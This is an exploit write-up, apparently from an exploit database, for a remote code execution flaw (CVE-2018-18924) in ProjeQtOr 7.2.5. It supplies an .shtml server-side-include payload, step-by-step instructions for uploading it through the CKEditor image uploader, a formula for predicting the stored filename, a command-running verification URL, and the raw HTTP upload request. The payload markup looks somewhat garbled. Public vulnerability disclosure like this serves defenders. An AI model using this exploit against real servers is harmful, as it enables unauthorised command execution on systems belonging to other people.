# Exploit Title: ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution# Date: 2018-10-22# Exploit Author: Özkan Mustafa Akkuş (AkkuS)# Contact: https://pentest.com.tr# Vendor Homepage: https://www.projeqtor.org# Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV7.2.5.zip/download# Version: v7.2.5# Category: Webapps# Tested on: XAMPP for Linux 7.2.8-0# CVE: CVE-2018-18924# Description : ProjeQtOr PMT 7.2.5 and lower versions allows to upload arbitrary "shtml" files which# leads to a remote command execution on the remote server.# 1) Create a file with the below HTML code and save it as .shtml<html><script>
function fex(){
document.location.href="https://www.exploit-db.com/exploits/45680/<!--#echo var=DOCUMENT_NAME-->?"+document.getElementById('komut').value;}</script><!--#exec cmd=$output --></html># 2) Login to ProjeQtOr portal as priviliage user# 3) You can perform this operation in the ckeditor fields.# 4) Click (Image) button on Content panel.# 5) Chose Upload section and browse your .shtml file.# 6) Click "Send it to Server". Script will give you "This file is not a valid image." error.# But it will send the file to the server. Just we need to find the file.# 7) We can read how the uploaded files are named in the# "/tool/uploadImage.php" file.(line 90)<?php
$fileName=date('YmdHis').'_'.getSessionUser()->id.'_'.$uploadedFile['name'];
?># 8) The name of our file should be;
Y = Years, numeric, at least 2 digits with leading 0
m = Months, numeric
d = Days, numeric
H = Hours, numeric, at least 2 digits with leading 0
i = Minutes, numeric
s = Seconds, numeric
# We must save the date and time of the upload moment.
Formula : Y+m+d+H+i+s+_+UserID+_+filename = uploaded file name
# For Example; If you uploaded a file called "RCE.shtml" on 2018.10.23 at 01:02:30# the file name will be "20181023010230_1_RCE.shtml"# 9) Finaly all uploaded images are sent under the "/files/images/" folder.# 10) Verift the exploit: http://domain/files/images/20181023010230_1_RCE.shtml?whoami
The request:
POST
/tool/uploadImage.php?CKEditor=result&CKEditorFuncNum=80&langCode=en
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0(X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/view/main.php
Cookie: projeqtor=cd3d5cf676e8598e742925cfd2343696;
ckCsrfToken=7o1qC0Wtz7Z5QjiZ8cFuzc6yjnWdLjiHMeTalZ6n;
PHPSESSID=bc0a9f0a918ccf0deae6de127d9b73e0
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---------------------------1783728277808111921873701375
Content-Length:550-----------------------------1783728277808111921873701375
Content-Disposition: form-data; name="upload"; filename="RCE.shtml"
Content-Type: text/html
[shtml file content]-----------------------------1783728277808111921873701375
Content-Disposition: form-data; name="ckCsrfToken"
7o1qC0Wtz7Z5QjiZ8cFuzc6yjnWdLjiHMeTalZ6n
-----------------------------1783728277808111921873701375--
HTTP/1.1200 OK
Date: Mon,23 Oct 201801:02:30 GMT